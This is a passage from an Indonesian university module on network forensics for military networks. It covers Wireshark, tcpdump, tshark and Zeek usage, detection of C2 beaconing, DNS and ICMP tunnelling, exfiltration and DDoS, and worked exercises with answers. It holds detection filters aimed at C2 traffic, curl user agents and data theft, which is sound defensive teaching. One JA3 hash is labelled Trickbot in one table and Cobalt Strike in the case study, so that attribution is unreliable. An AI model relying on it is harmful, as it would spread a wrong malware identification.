2. Filtering β Filter noise; fokus pada IP/port/timeframe relevan
3. Correlation β Korelasikan event dari berbagai sumber
4. Timeline β Susun timeline kronologis
5. Analysis β Identifikasi teknik dan taktik penyerang
6. Attribution β Kaitkan dengan aktor ancaman yang dikenal
7. Reporting β Dokumentasi temuan dan rekomendasi
Teknik-teknik penting dalam Wireshark untuk rekonstruksi:
| Teknik | Menu/Filter | Kegunaan |
|---|---|---|
| Follow TCP Stream | Klik kanan β Follow β TCP Stream | Melihat keseluruhan komunikasi satu sesi |
| Export Objects | File β Export Objects β HTTP/SMB/FTP | Mengekstrak file yang ditransfer |
| Conversations | Statistics β Conversations | Melihat ringkasan semua komunikasi |
| IO Graph | Statistics β I/O Graph | Visualisasi volume lalu lintas dari waktu ke waktu |
| Protocol Hierarchy | Statistics β Protocol Hierarchy | Distribusi protokol dalam capture |
| Expert Information | Analyze β Expert Information | Warning dan error yang terdeteksi |
Filter untuk mendeteksi port scanning:
# SYN Scan β banyak SYN dari satu IP ke banyak port
tcp.flags.syn == 1 && tcp.flags.ack == 0
# Statistik endpoint: Statistics β Endpoints β TCP
# Cari source IP dengan jumlah destination port sangat tinggi
# SSH Brute Force β banyak koneksi ke port 22
tcp.dstport == 22 && tcp.flags.syn == 1
# HTTP Login Brute Force β banyak POST ke halaman login
http.request.method == "POST" && http.request.uri contains "login"
# Failed authentication patterns
# Banyak koneksi dengan durasi sangat singkat ke port yang sama
# Transfer data besar ke luar jaringan
# Gunakan Statistics β Conversations β TCP
# Cari koneksi dengan bytes transferred sangat tinggi ke IP eksternal
# DNS Exfiltration
dns.qry.name.len > 50
# ICMP Tunneling
icmp.type == 8 && data.len > 64
# Beaconing pattern β koneksi periodik ke IP yang sama
# Analisis interval koneksi menggunakan:
# Statistics β Flow Graph
# HTTP C2 dengan User-Agent tidak lazim
http.user_agent contains "bot" || http.user_agent contains "curl" || http.user_agent == ""
# DNS C2 β query berulang ke satu domain dengan interval reguler
dns.qry.name contains "c2domain.net"
Soal: Anda diberikan file PCAP dari jaringan Mabes TNI dan diminta mengidentifikasi apakah terdapat aktivitas Command and Control (C2). Jelaskan langkah-langkah analisis yang akan Anda lakukan menggunakan Wireshark!
Penyelesaian:
Step 1: Identifikasi Koneksi Anomali
Step 2: Analisis Beaconing Pattern
ip.dst == [suspicious_IP] lalu analisis timestamp antar paketStep 3: Analisis DNS untuk C2 Domain
dns lalu analisis domain yang di-queryStep 4: Analisis HTTP/HTTPS C2
http.request untuk melihat semua HTTP request/check-in, /beacon, /gate.php)tls.handshake.extensions_server_nameStep 5: Analisis Payload
Step 6: Korelasi dan Validasi
Jawaban: Analisis C2 dalam PCAP dilakukan melalui enam langkah: identifikasi koneksi anomali (banyak sesi ke satu IP), analisis beaconing pattern (interval koneksi periodik), analisis DNS untuk C2 domain (query berulang ke domain mencurigakan), analisis HTTP/HTTPS (User-Agent dan URL pattern), analisis payload (encoding mencurigakan), dan korelasi dengan threat intelligence.
Covert Channel adalah metode komunikasi yang menggunakan saluran atau protokol yang tidak dimaksudkan untuk transfer data, dengan tujuan menyembunyikan komunikasi dari deteksi keamanan.
Jenis-jenis covert channel yang umum:
| Metode | Protokol | Teknik | Deteksi |
|---|---|---|---|
| DNS Tunneling | DNS | Data encoded dalam subdomain query | Query panjang tidak wajar; volume tinggi ke satu domain |
| ICMP Tunneling | ICMP | Data dalam payload ping | ICMP payload besar (>64 bytes); volume tinggi |
| HTTP Tunneling | HTTP | Data dalam header kustom atau URL parameter | Header tidak standar; URL panjang tidak wajar |
| Steganography | Varies | Data tersembunyi dalam gambar/file | Deteksi statistik; file size anomaly |
| Timing Channel | Any | Informasi encoded dalam interval antar paket | Analisis pola timing |
# Wireshark: Identifikasi transfer data besar ke luar
# Statistics β Conversations β TCP
# Sort by Bytes (BβA untuk outbound)
# Threshold alert: > 10 MB ke satu IP eksternal dalam satu sesi
# Filter koneksi dengan data besar
tcp.len > 1400 && ip.dst != 10.0.0.0/8 && ip.dst != 172.16.0.0/12 && ip.dst != 192.168.0.0/16
# ICMP dengan payload besar (potential tunneling)
icmp && data.len > 64
# DNS dengan query panjang (potential tunneling)
dns.qry.name.len > 50
# HTTP POST dengan body besar ke domain external
http.request.method == "POST" && http.content_length > 1000000
Soal: Dalam investigasi jaringan Kodam, Anda menemukan bahwa host 192.168.1.50 mengirim rata-rata 200 ICMP echo request per menit ke IP 203.0.113.100, dengan payload rata-rata 512 bytes per paket. Analisis apakah ini merupakan ICMP tunneling dan estimasi volume data yang mungkin telah di-exfiltrate selama 24 jam!
Penyelesaian:
Step 1: Analisis apakah ini normal:
| Parameter | Normal Ping | Temuan Ini |
|---|---|---|
| Frekuensi | 1-4/siklus | 200/menit |
| Payload | 32-64 bytes | 512 bytes |
| Durasi | Beberapa detik | 24 jam terus menerus |
| Destination | Bervariasi | Satu IP tetap |
Step 2: Indikator ICMP tunneling:
Step 3: Estimasi volume data exfiltration:
Step 4: Kesimpulan β ini hampir pasti ICMP tunneling yang digunakan untuk data exfiltration. Volume 140 MB dalam 24 jam cukup untuk mengekstrak sejumlah besar dokumen, database, atau file konfigurasi.
Jawaban: Ini sangat kuat merupakan ICMP tunneling. Frekuensi 200 paket/menit dengan payload 512 bytes sangat jauh dari pola ICMP normal. Estimasi data yang di-exfiltrate selama 24 jam adalah ~140.6 MB (512 bytes Γ 200 paket/menit Γ 60 menit Γ 24 jam). Volume ini cukup signifikan untuk mentransfer dokumen rahasia dalam jumlah besar.
Dengan meningkatnya penggunaan enkripsi (HTTPS, TLS, SSH), investigator forensik menghadapi tantangan signifikan dalam menganalisis konten komunikasi. Namun, metadata yang tidak terenkripsi tetap memberikan informasi berharga.
Client Hello:
TLS Version: 1.3
SNI: mail.protonmail.com
Cipher Suites: TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256
Extensions: supported_versions, key_share, psk_key_exchange_modes
Server Hello:
TLS Version: 1.3
Selected Cipher: TLS_AES_256_GCM_SHA384
Certificate:
Subject: CN=mail.protonmail.com
Issuer: Let's Encrypt Authority X3
Valid From: 2025-01-01
Valid To: 2025-04-01
Serial: 03:AB:CD:EF:12:34:56:78
Informasi forensik dari TLS handshake:
| Elemen | Informasi |
|---|---|
| SNI | Domain yang diakses (kecuali pada TLS 1.3 dengan ECH) |
| Certificate | Identitas server; certificate self-signed = mencurigakan |
| Cipher suite | Level keamanan enkripsi yang digunakan |
| JA3/JA3S hash | Fingerprint klien/server TLS β dapat mengidentifikasi malware |
JA3 adalah metode fingerprinting koneksi TLS berdasarkan parameter Client Hello (TLS version, cipher suites, extensions, elliptic curves, dan elliptic curve point formats), menghasilkan hash MD5 yang unik untuk setiap kombinasi.
JA3 Hash Examples:
Malware Trickbot: e7d705a3286e19ea42f587b344ee6865
Chrome Browser: b32309a26951912be7dba376398abc3b
Firefox Browser: 839bbe3ed07fed922ded5aaf714d6842
curl tool: 456523fc94726331a4d5a2e1d40b2cd7
JA3 hash dapat digunakan untuk:
Soal: Dalam analisis PCAP, semua koneksi ke server C2 menggunakan HTTPS sehingga payload terenkripsi. Jelaskan informasi apa saja yang masih dapat Anda kumpulkan tanpa mendekripsi traffic!
Penyelesaian:
Step 1: Informasi dari metadata jaringan (tanpa dekripsi):
| Sumber | Informasi | Kegunaan |
|---|---|---|
| IP Header | IP sumber/tujuan | Identifikasi host terlibat dan server C2 |
| TCP Header | Port, timestamps, flags | Pola komunikasi, waktu, durasi |
| TLS SNI | Domain tujuan | Identifikasi domain C2 |
| TLS Certificate | CN, issuer, validity | Validasi identitas server; self-signed = C2 |
| JA3 Hash | TLS fingerprint klien | Identifikasi malware family |
| Packet Size | Bytes per paket | Pola transfer data |
| Timing | Inter-arrival time | Deteksi beaconing |
| Volume | Total bytes transferred | Estimasi data exfiltration |
| DNS | Domain resolution | Domain C2 dan infrastructure |
Step 2: Teknik analisis tambahan:
Jawaban: Tanpa dekripsi, informasi yang masih tersedia meliputi: IP sumber/tujuan, port, TLS SNI (domain), certificate details, JA3 fingerprint, ukuran paket, pola timing (beaconing), volume transfer, dan DNS queries. Informasi ini cukup untuk mengidentifikasi C2 server, mendeteksi beaconing, estimasi volume exfiltration, dan bahkan mengidentifikasi malware family melalui JA3 hash.
Monitoring jaringan dan intersepsi komunikasi di Indonesia diatur oleh beberapa regulasi:
| Regulasi | Ketentuan Relevan |
|---|---|
| UU No. 1/2024 (ITE) | Intersepsi harus berdasarkan perintah pengadilan atau penegak hukum |
| PP No. 71/2019 | Penyelenggaraan sistem elektronik; kewajiban logging |
| UU No. 3/2002 (Pertahanan Negara) | Wewenang pertahanan dalam pengamanan informasi |
| Perpres No. 82/2022 (BSSN) | Koordinasi keamanan siber nasional |
Dalam konteks militer Indonesia, monitoring jaringan diperbolehkan dengan memperhatikan:
Contoh Banner Login pada Jaringan Militer:
===========================================
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β PERHATIAN: Ini adalah sistem informasi milik β
β Tentara Nasional Indonesia (TNI). β
β β
β Dengan mengakses sistem ini, Anda menyetujui bahwa: β
β β’ Aktivitas Anda dapat dipantau dan direkam β
β β’ Tidak ada harapan privasi pada sistem ini β
β β’ Penggunaan tidak sah akan ditindak sesuai hukum β
β β
β Akses tidak sah merupakan pelanggaran hukum. β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Soal: Seorang investigator forensik diminta melakukan full packet capture pada jaringan Kodam selama satu minggu. Jelaskan pertimbangan hukum dan etika yang harus diperhatikan!
Penyelesaian:
Step 1: Pertimbangan hukum:
Step 2: Pertimbangan etika:
Step 3: Prosedural:
Jawaban: Full packet capture pada jaringan Kodam memerlukan otorisasi tertulis dari Komandan, dasar hukum yang jelas, scope dan durasi yang terdefinisi, banner notification pada jaringan, prinsip proporsionalitas dan minimisasi data, enkripsi data sesuai klasifikasi, chain of custody yang ketat, dan retention policy yang jelas.
Wireshark adalah tool analisis protokol jaringan open-source paling populer yang memungkinkan capture dan analisis interaktif terhadap lalu lintas jaringan secara mendalam.
Fitur utama Wireshark untuk forensik:
| Fitur | Kegunaan Forensik |
|---|---|
| Display Filters | Menyaring paket berdasarkan berbagai kriteria |
| Follow Stream | Merekonstruksi sesi komunikasi lengkap |
| Export Objects | Mengekstrak file yang ditransfer (HTTP, SMB, FTP, dll.) |
| Statistics | Ringkasan percakapan, protokol, dan endpoint |
| Expert Info | Mendeteksi anomali dan error dalam traffic |
| Coloring Rules | Visualisasi tipe traffic berdasarkan warna |
| Profile | Konfigurasi custom untuk berbagai jenis analisis |
# tcpdump - capture paket dari command line
# Capture semua traffic pada interface eth0, simpan ke file
tcpdump -i eth0 -w capture.pcap
# Capture hanya traffic HTTP
tcpdump -i eth0 port 80 -w http_traffic.pcap
# Capture traffic dari/ke IP tertentu
tcpdump -i eth0 host 192.168.1.100 -w specific_host.pcap
# TShark - command line version Wireshark
# Membaca PCAP dan menampilkan summary
tshark -r capture.pcap
# Extract semua HTTP requests
tshark -r capture.pcap -Y "http.request" -T fields -e ip.src -e http.host -e http.request.uri
# Extract DNS queries
tshark -r capture.pcap -Y "dns.qry.name" -T fields -e ip.src -e dns.qry.name
NetworkMiner adalah Network Forensic Analysis Tool (NFAT) open-source yang secara otomatis mengekstrak file, gambar, credential, dan informasi host dari file PCAP.
Keunggulan NetworkMiner:
# Zeek - network analysis framework
# Analisis PCAP file
zeek -r capture.pcap
# Menghasilkan beberapa log file:
# conn.log - semua koneksi
# dns.log - query DNS
# http.log - request HTTP
# ssl.log - koneksi SSL/TLS
# files.log - file yang terdeteksi
# notice.log - alert dan anomali
# Contoh conn.log
# ts uid orig_h orig_p resp_h resp_p proto
1705299825 CYhJZW4 192.168.1.100 49152 203.0.113.50 443 tcp
| Tool | Tipe | Kelebihan | Keterbatasan |
|---|---|---|---|
| Wireshark | GUI Analyzer | Visual, interaktif, fitur lengkap | Lambat untuk file besar (>1 GB) |
| tcpdump | CLI Capture | Ringan, cepat, tersedia di semua Linux | Analisis terbatas |
| TShark | CLI Analyzer | Automatable, scriptable | Butuh command line expertise |
| NetworkMiner | NFAT | Ekstraksi otomatis, mudah digunakan | Fitur analisis kurang mendalam |
| Zeek | NSM Framework | Analisis mendalam, log terstruktur | Learning curve tinggi |
| Nmap | Scanner | Port scanning, service detection | Bukan tool analisis forensik |
Soal: Sebutkan kombinasi tools yang paling efektif untuk investigasi forensik jaringan pada kasus data exfiltration di pangkalan militer!
Penyelesaian:
Step 1: Identifikasi kebutuhan berdasarkan tahapan investigasi:
| Tahap | Tool | Alasan |
|---|---|---|
| Capture | tcpdump | Ringan, cepat, tidak membebani sistem |
| Quick Triage | NetworkMiner | Ekstraksi otomatis file dan kredensial dari PCAP |
| Deep Analysis | Wireshark | Analisis mendalam per paket; Follow Stream; Expert Info |
| Automated Processing | Zeek | Log terstruktur untuk korelasi; conn.log dan dns.log |
| Scripted Analysis | TShark | Otomasi ekstraksi field tertentu untuk batch processing |
| File Analysis | Wireshark Export + hashing tools | Verifikasi file yang diekstrak dari network capture |
Step 2: Workflow yang direkomendasikan:
tcpdump (capture) β NetworkMiner (quick triage) β Zeek (automated logs)
β
Wireshark (deep analysis) β TShark (scripted extraction) β
Jawaban: Kombinasi optimal adalah: tcpdump untuk capture (ringan dan cepat), NetworkMiner untuk quick triage (ekstraksi otomatis), Zeek untuk automated processing (log terstruktur), Wireshark untuk deep analysis (analisis mendalam), dan TShark untuk scripted extraction. Workflow dimulai dari capture β quick triage β automated processing β deep analysis.
Latar Belakang: Tim Satsiber TNI mendeteksi anomali pada jaringan Kodam XII/Tanjungpura. IDS mencatat alert berkala dari satu workstation, dan monitoring bandwidth menunjukkan peningkatan outbound traffic di luar jam kerja.
Kronologi Investigasi:
Fase 1: Alert Review
[IDS Alert] 2025-01-15 02:00:03 ET MALWARE Possible CnC Activity
Source: 192.168.10.45 Destination: 185.100.87.XXX:443
[IDS Alert] 2025-01-15 02:05:02 ET MALWARE Possible CnC Activity
Source: 192.168.10.45 Destination: 185.100.87.XXX:443
[IDS Alert] 2025-01-15 02:10:04 ET MALWARE Possible CnC Activity
Source: 192.168.10.45 Destination: 185.100.87.XXX:443
Pola: Alert setiap ~5 menit pada jam 02:00 dini hari β beaconing pattern.
Fase 2: PCAP Analysis
Investigator mengumpulkan PCAP dari TAP pada gateway dan menganalisis:
Wireshark Filter: ip.src == 192.168.10.45 && ip.dst == 185.100.87.XXX
Temuan:
- 288 koneksi HTTPS dalam 24 jam (interval ~5 menit)
- TLS SNI: update-service.cloud-sync[.]net
- JA3 Hash: e7d705a3286e19ea42f587b344ee6865 (match Cobalt Strike)
- Certificate: Self-signed, CN=localhost
- Data transfer: avg 2 KB per request, dengan spike 45 MB pada 02:30
Fase 3: DNS Analysis
DNS Query Log:
192.168.10.45 β update-service.cloud-sync.net (A record) β 185.100.87.XXX
192.168.10.45 β check.cloud-sync.net (TXT record) β [encoded response]
Fase 4: Korelasi
Korelasi dengan log DHCP dan Active Directory:
Fase 5: Temuan dan Rekomendasi
| Temuan | Detail |
|---|---|
| Malware | Cobalt Strike beacon (berdasarkan JA3 hash) |
| C2 Server | 185.100.87.XXX (cloud-sync[.]net) |
| Beaconing | Interval 5 menit via HTTPS |
| Exfiltration | ~45 MB data pada jam 02:30 |
| Host Terdampak | WS-INTEL-007 (unit Intelijen) |
| Durasi Kompromis | Minimal 24 jam (kemungkinan lebih lama) |
Soal: Berdasarkan studi kasus di atas, mengapa self-signed certificate pada C2 server merupakan indikator penting, dan bagaimana cara mendeteksinya secara otomatis dalam volume PCAP yang besar?
Penyelesaian:
Step 1: Mengapa self-signed certificate penting:
Step 2: Deteksi otomatis menggunakan TShark:
# Ekstrak certificate yang issuer == subject (self-signed)
tshark -r capture.pcap -Y "tls.handshake.certificate" \
-T fields -e ip.dst -e tls.handshake.certificate \
| grep -i "self-signed"
# Menggunakan Zeek untuk analisis certificate:
# File ssl.log otomatis mencatat validation_status
cat ssl.log | awk '$NF ~ /self signed/' | cut -f3,5,10
Step 3: Pendekatan enterprise:
Jawaban: Self-signed certificate pada C2 server penting karena server legitimate umumnya menggunakan CA terpercaya, sedangkan C2 server sering menggunakan self-signed (issuer = subject). Deteksi otomatis dapat dilakukan menggunakan TShark untuk mengekstrak certificate info dari PCAP, Zeek ssl.log yang otomatis mencatat validation status, atau whitelist-based alerting pada firewall untuk koneksi ke server dengan self-signed certificate eksternal.
Soal: Apa perbedaan antara display filter dan capture filter di Wireshark? Berikan contoh masing-masing!
Penyelesaian:
| Aspek | Capture Filter (BPF) | Display Filter (Wireshark) |
|---|---|---|
| Kapan | Saat capture berlangsung | Setelah capture, untuk viewing |
| Syntax | Berkeley Packet Filter | Wireshark proprietary |
| Performance | Mengurangi data yang di-capture | Menyembunyikan paket di display |
| Contoh HTTP | port 80 |
http |
| Contoh IP | host 192.168.1.100 |
ip.addr == 192.168.1.100 |
| Contoh DNS | port 53 |
dns |
| Reversible | β Data yang tidak dicapture hilang | β Dapat diubah kapan saja |
Jawaban: Capture filter (BPF syntax) diterapkan saat proses capture untuk membatasi paket yang direkam (irreversible), sedangkan display filter (Wireshark syntax) diterapkan setelah capture untuk menyaring tampilan (reversible). Untuk forensik, disarankan capture tanpa filter (untuk kelengkapan), lalu gunakan display filter untuk analisis.
Soal: Jelaskan bagaimana Wireshark Export Objects dapat digunakan untuk mengekstrak file dari packet capture dan berikan langkah-langkahnya!
Penyelesaian:
Step 1: Buka PCAP file di Wireshark
Step 2: Navigasi ke File β Export Objects β pilih protokol:
Step 3: Pada dialog Export Objects:
Step 4: Pilih file yang ingin diekstrak β Save atau Save All
Step 5: Verifikasi integritas file yang diekstrak:
# Hitung hash file yang diekstrak
md5sum extracted_file.pdf
sha256sum extracted_file.pdf
Jawaban: Export Objects di Wireshark (File β Export Objects β HTTP/SMB/FTP) memungkinkan ekstraksi otomatis file yang ditransfer melalui jaringan. Dialog menampilkan hostname, content type, size, dan filename. File yang diekstrak harus diverifikasi integritasnya menggunakan hash.
Soal: Dalam konteks jaringan militer, mengapa flow data (NetFlow) sering lebih praktis daripada full packet capture untuk monitoring jangka panjang?
Penyelesaian:
| Aspek | Full PCAP | NetFlow |
|---|---|---|
| Storage | ~10 TB/hari (1 Gbps) | ~20 GB/hari (1 Gbps) β rasio 500:1 |
| Privacy | Merekam konten lengkap | Hanya metadata (tanpa payload) |
| Legal | Mungkin memerlukan izin khusus | Biasanya tercakup dalam monitoring standar |
| Processing | Membutuhkan analisis intensif | Mudah di-query dan di-aggregate |
| Retention | Terbatas (hari-minggu) | Dapat disimpan berbulan-bulan |
| Real-time | Sulit pada kecepatan tinggi | Mudah dianalisis secara real-time |
Untuk jaringan militer:
Jawaban: NetFlow lebih praktis untuk monitoring jangka panjang karena rasio storage 500:1 dibanding PCAP, tidak merekam konten (mengurangi masalah privasi), mudah dianalisis secara real-time, dan dapat disimpan selama berbulan-bulan. Pendekatan optimal adalah monitoring flow data secara kontinu dengan full PCAP yang diaktifkan on-demand saat anomali terdeteksi.
Soal: Bagaimana cara membedakan DDoS attack dari legitimate traffic spike dalam PCAP? Berikan filter Wireshark yang relevan!
Penyelesaian:
Step 1: Indikator DDoS vs legitimate spike:
| Indikator | DDoS Attack | Legitimate Spike |
|---|---|---|
| Source IPs | Banyak IP berbeda (distributed) | Bervariasi, dari IP yang dikenal |
| Request pattern | Identik/similar requests | Request bervariasi dan natural |
| Geographic distribution | Dari banyak negara secara bersamaan | Sesuai demografi user |
| Protocol | Sering single protocol | Mix protocols |
| TCP behavior | Banyak incomplete handshake | Normal handshake |
| Timing | Mendadak, tanpa gradual increase | Biasanya gradual |
Step 2: Filter Wireshark untuk identifikasi DDoS:
# SYN Flood - banyak SYN tanpa ACK
tcp.flags.syn == 1 && tcp.flags.ack == 0
# Statistik unique source IP
# Statistics β Endpoints β IPv4 β Sort by Packets
# UDP Flood
udp && !dns && !dhcp
# HTTP Flood
http.request && (http.request.method == "GET" || http.request.method == "POST")
# Kemudian: Statistics β HTTP β Requests β Sort by Count
# ICMP Flood
icmp.type == 8
# DNS Amplification
dns.flags.response == 1 && dns.resp.len > 512
Step 3: Teknik konfirmasi:
# IO Graph untuk melihat traffic spike
# Statistics β IO Graph β Filter: tcp.flags.syn == 1
# Conversation analysis
# Statistics β Conversations β IPv4
# Cari: banyak source IP dengan sedikit paket masing-masing = DDoS
# sedikit source IP dengan banyak paket = legitimate atau DoS
Jawaban: DDoS dapat dibedakan dari legitimate spike melalui: analisis distribusi source IP (banyak IP dengan sedikit paket = DDoS), pola request yang identik, banyak incomplete TCP handshake, dan peningkatan mendadak tanpa gradual. Filter Wireshark meliputi SYN flood detection (tcp.flags.syn == 1 && tcp.flags.ack == 0), endpoint statistics, dan IO Graph untuk visualisasi spike.
Soal: Seorang investigator menemukan file PCAP berukuran 50 GB dari jaringan Lantamal. Jelaskan strategi yang efisien untuk menganalisis file sebesar ini!
Penyelesaian:
Step 1: Jangan buka langsung di Wireshark β file 50 GB akan sangat lambat dan memerlukan RAM besar.
Step 2: Gunakan pendekatan berlapis:
| Langkah | Tool | Tujuan |
|---|---|---|
| 1. Overview | capinfos capture.pcap |
Statistik dasar: jumlah paket, durasi, data rate |
| 2. Automated Parsing | Zeek: zeek -r capture.pcap |
Generate log files terstruktur (conn, dns, http, ssl) |
| 3. Flow Summary | tshark -r capture.pcap -qz conv,tcp |
Ringkasan semua konversi TCP |
| 4. Filtering | tcpdump -r capture.pcap -w filtered.pcap [filter] |
Ekstrak subset berdasarkan kriteria |
| 5. Split | editcap -c 100000 capture.pcap split_ |
Pecah menjadi file-file kecil (100K paket) |
| 6. Targeted Analysis | Wireshark pada file filtered/split | Analisis mendalam pada subset relevan |
Step 3: Contoh workflow untuk investigasi data exfiltration:
# Step 1: Overview
capinfos capture.pcap
# Step 2: Generate Zeek logs
zeek -r capture.pcap
# Step 3: Identifikasi top talkers
cat conn.log | zeek-cut id.orig_h id.resp_h orig_bytes | sort -t$'\t' -k3 -rn | head -20
# Step 4: Filter koneksi besar ke IP eksternal
tcpdump -r capture.pcap 'dst net not (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16) and greater 1000' -w exfil_candidates.pcap
# Step 5: Analisis di Wireshark
wireshark exfil_candidates.pcap
Jawaban: Untuk PCAP 50 GB, gunakan pendekatan berlapis: capinfos untuk overview, Zeek untuk automated parsing ke log terstruktur, tshark/tcpdump untuk filtering dan ekstraksi subset relevan, editcap untuk split file, dan baru kemudian Wireshark untuk analisis mendalam pada subset yang sudah difilter. Jangan pernah membuka file 50 GB langsung di Wireshark.
Soal: Tim Satsiber TNI mendeteksi bahwa sebuah workstation di kantor intelijen mengirim data ke server di luar negeri setiap malam pukul 02:00. Investigasi awal menunjukkan traffic terenkripsi (HTTPS). Rancang rencana investigasi forensik jaringan yang komprehensif!
Penyelesaian:
Step 1: Fase Persiapan
Step 2: Fase Collection (3-5 hari)
# Full packet capture pada segmen yang relevan
tcpdump -i eth0 host [workstation_IP] -w investigation_%Y%m%d%H%M%S.pcap -G 3600 -Z root
# Paralel: Kumpulkan DNS logs, firewall logs, IDS alerts, dan proxy logs
# untuk periode yang sama
Step 3: Fase Analysis
a) Traffic Pattern Analysis:
b) TLS/Certificate Analysis:
tshark -r capture.pcap -Y "tls.handshake.type == 2" \
-T fields -e ip.dst -e tls.handshake.extensions_server_name \
-e tls.handshake.certificate
c) DNS Correlation:
d) Threat Intelligence:
Step 4: Fase Korelasi
Step 5: Fase Response dan Reporting
Jawaban: Rencana investigasi mencakup lima fase: Persiapan (otorisasi, sensor, storage), Collection (full PCAP + multi-source logs selama 3-5 hari), Analysis (traffic patterns, TLS/certificate analysis, DNS correlation, threat intelligence cross-reference), Korelasi (timeline construction dari semua sumber), dan Response (documentation, IOC extraction, remediation recommendations). Pendekatan ini memastikan investigasi menyeluruh meskipun traffic terenkripsi.
| Topik | Poin Kunci |
|---|---|
| Prinsip Forensik Jaringan | Catch-it-as-you-can vs stop-look-listen; data in motion vs data at rest |
| Network Evidence | Full PCAP, flow data, log files; masing-masing dengan kelebihan/kekurangan |
| Protocol Analysis | TCP flags, DNS forensics, HTTP analysis, SMTP analysis |
| IDS/Firewall | Alert analysis, log korelasi, timeline reconstruction |
| Wireless Forensics | Beacon frames, probe requests, rogue AP detection |
| Attack Reconstruction | Metodologi korelasi multi-sumber |
| Covert Channels | DNS tunneling, ICMP tunneling, detection techniques |
| Encrypted Traffic | TLS metadata, JA3 fingerprinting, certificate analysis |
| Legal Considerations | UU ITE, otorisasi monitoring, chain of custody |
| Tools | Wireshark, tcpdump, TShark, NetworkMiner, Zeek |
| Istilah | Definisi |
|---|---|
| Beaconing | Pola komunikasi periodik dari malware ke C2 server |
| C2 (Command and Control) | Server yang digunakan penyerang untuk mengendalikan malware |
| Covert Channel | Saluran komunikasi tersembunyi menggunakan protokol tidak semestinya |
| DGA (Domain Generation Algorithm) | Algoritma yang menghasilkan nama domain secara otomatis untuk C2 |
| DNS Tunneling | Teknik pengiriman data melalui protokol DNS |
| Flow Data | Ringkasan metadata komunikasi jaringan |
| Full Packet Capture (PCAP) | Perekaman lengkap semua paket jaringan |
| JA3 | Metode fingerprinting koneksi TLS berdasarkan Client Hello |
| Network TAP | Perangkat keras untuk menyalin lalu lintas jaringan |
| Rogue Access Point | Access point tidak sah yang dipasang di jaringan |
| SNI (Server Name Indication) | Extension TLS yang mengindikasikan domain yang diakses |
| SPAN Port | Fitur switch untuk mengkopi traffic ke port monitoring |
Modul ini disusun sebagai bahan ajar Mata Kuliah Digital Forensic for Military Purposes, Program Studi Teknologi Informasi Pertahanan, Universitas Pertahanan RI.
Lisensi: Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0)